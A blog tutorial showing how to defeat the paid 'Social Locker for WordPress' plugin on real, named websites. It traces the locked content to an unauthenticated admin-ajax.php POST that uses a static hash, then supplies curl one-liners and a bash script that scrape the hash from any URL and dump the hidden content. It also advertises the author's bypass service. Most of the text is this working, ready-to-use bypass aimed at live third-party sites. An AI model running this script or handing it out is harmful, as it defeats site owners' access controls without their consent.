JavaScript Attacks: how to bypass Social Locker for WordPress (CASE)

The “JavaScript Attacks” article shows examples of bypassing JavaScript protection on a website. It is clear that there is a case study there, so it is pretty pointless. Let’s take a more real situation. In the article “How to see locked HTML code, how to bypass social content lockers and other website info gathering countermeasures” I showed how easy it is to bypass social lockers, since hidden links and text are contained on the page, but styles are used to make this block invisible. I even made a small service that will show you everything that social blockers hide. It is so simple that you don’t even have to deal with JavaScript.

But I got an example site (_https: //www.yasir252.com/software/download-adobe-photoshop-cc-2020-full-version-windows/) which uses a trickier social locker.

Looking ahead, I’ll say that this is a paid plugin called “Social Locker for WordPress” and it costs $27:

And this is not an abandoned plugin, at the time of writing, the last update was made on May 8, 2020.

Let's start by analyzing HTML and JavaScript code.

As you can see, in the source code we can find name BizPanda Lockers, the path to this file /sociallocker-next-premium/bizpanda, I googled and found a page for this Social Locker for WordPress.

The analysis of the source code of the page showed that the contents of the hidden block are absent in it, although there are some interesting data:

if(!window.bizpanda) window.bizpanda={};
if(!window.bizpanda.lockerOptions) window.bizpanda.lockerOptions={};
window.bizpanda.lockerOptions['onpLock951887']={"lockerId":"3169","tracking":"0","postId":17162,"ajaxUrl":"https:\/\/www.yasir252.com\/wp-admin\/admin-ajax.php","options":{"demo":1,"actualUrls":0,"text":{"header":"Link Download Tanpa Iklan","message":"
Klik salah satu tombol dibawah ini untuk download tanpa iklan.<\/p>"},"theme":"great-attractor","lang":"en_US","agreement":{"note":0,"termsUrl":false,"privacyPolicyUrl":false,"showInPopup":{"width":570,"height":400}},"overlap":{"mode":"full","position":"middle","altMode":"full"},"highlight":0,"googleAnalytics":0,"locker":{"counter":1,"loadingTimeout":"20000","tumbler":0,"naMode":"show-error","inAppBrowsers":"visible_with_warning","inAppBrowsersWarning":"You are viewing this page in the {browser}. The locker may work incorrectly in this browser. Please open this page in a standard browser.","close":0,"mobile":1,"expires":0},"proxy":"https:\/\/www.yasir252.com\/wp-admin\/admin-ajax.php?action=opanda_connect","groups":["social-buttons"],"socialButtons":{"counters":1,"order":["facebook-share","twitter-tweet"],"behaviorOnError":"show_error","behaviorError":"Matikan Adblock Untuk Download Tanpa Iklan","facebook":{"appId":"331196770812733","lang":"en_US","version":"v6.0","like":{"url":"https:\/\/www.facebook.com\/yasir252","title":"Like","theConfirmIssue":0},"share":{"url":"https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"Share","shareDialog":true}},"twitter":{"lang":"en","tweet":{"url":"https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","doubleCheck":1,"title":"Tweet"},"follow":{"url":"https:\/\/twitter.com\/yasir252com","title":"Follow us","doubleCheck":1,"hideScreenName":1}},"google":{"lang":"en","plus":{"url":"https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"+1 us"},"share":{"url":"https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"Share"}},"youtube":{"subscribe":{"channelId":"UCvPfXFZzw3x4I1FBYVlXbsg","title":"Youtube"}},"linkedin":{"share":{"url":"https:\/\/www.yasir252.com\/software\/download-adobe-photoshop-cc-2020-full-version-windows\/","title":"share"}}},"lazy":true},"_theme":"great-attractor","_style":null,"ajax":true,"contentHash":"e408051e78dd01cade57a25100ad70c7","stats":false};

An analysis of the JavaScript script file (_https: //www.yasir252.com/wp-content/plugins/sociallocker-next-premium/bizpanda/assets/js/lockers.020405.min.js) gave here an interesting fragment:

		// loading the locked content via ajax

		if( data.ajax ) {

			options.content = {
				url: data.ajaxUrl,
				type: 'POST',
				data: {
					lockerId: data.lockerId,
					action: 'opanda_loader',
					hash: data.contentHash
				}
			};
		}

Pay attention to the comment - “loading the locked content via ajax”.

The values of ajaxUrl, lockerId and contentHash can be found in the previous code snippet.

In fact, I found the second fragment after I realized how to bypass this social locker. It was possible to skip the analysis of the source code and immediately start by analyzing the POST request (see “How to analyze POST requests in web browsers”).

I “liked” the article to view hidden text:

As you can see, a POST request containing the string “lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7” is sent to the page https://www.yasir252.com/wp-admin/admin-ajax.php:

And in response comes a code hidden by a social locker:

Rendered page:

We are trying to get hidden text bypassing sharing on social networks:

curl https://www.yasir252.com/wp-admin/admin-ajax.php -d 'lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7'

Everything worked!

If you do not understand the HTML code, then save it to a file and open it in a web browser:

curl https://www.yasir252.com/wp-admin/admin-ajax.php -d 'lockerId=3169&action=opanda_loader&hash=e408051e78dd01cade57a25100ad70c7' > locker.htm && firefox locker.htm

Further analysis showed that the hash is static and always contained in the source code. The value of lockerId does not change, and any number can be substituted there (perhaps this is the result of a “crack”).

In order not to climb into the source code each time, we will create a script for automation. To the sociallocker-next-premium.sh file:

gedit sociallocker-next-premium.sh

Copy the following:

#!/bin/bash

if [[ -z $1 ]]; then
	echo 'Не указана ссылка для обхода социального блокировщика!';
	exit 1;
fi

t0=`curl -s -A 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36' "$1"`

hash="`echo "$t0" | grep -E 'window.bizpanda.lockerOptions' | grep -E -o '"contentHash":"[A-Za-z0-9]{8,}"' | sed 's/"contentHash":"//' | sed 's/"//'`";
t5=$hash

url="`echo $1 | grep -E -o 'http(|s)://[^/]+'`/wp-admin/admin-ajax.php"

if [[ "$t5" ]]; then
	curl $url -d 'lockerId=3169&action=opanda_loader&hash='$hash
fi

Run like this:

bash sociallocker-next-premium.sh 'URL'

For instance:

bash sociallocker-next-premium.sh 'https://www.hourlybook.com/entrance-exams/national-eligibility-cum-entrance-test/neet-biodiversity-and-conversation-practice-questions-2017/'

To immediately see the content after rendering the HTML code, use the construct:

bash sociallocker-next-premium.sh 'URL' > locker.htm && firefox locker.htm

For instance:

bash sociallocker-next-premium.sh 'https://www.hourlybook.com/entrance-exams/national-eligibility-cum-entrance-test/neet-practice-questions-environmental-issues-2017/' > locker.htm && firefox locker.htm

I added support for this plugin to my social locker bypass service: https://w-e-b.site/?act=social-locker-cracker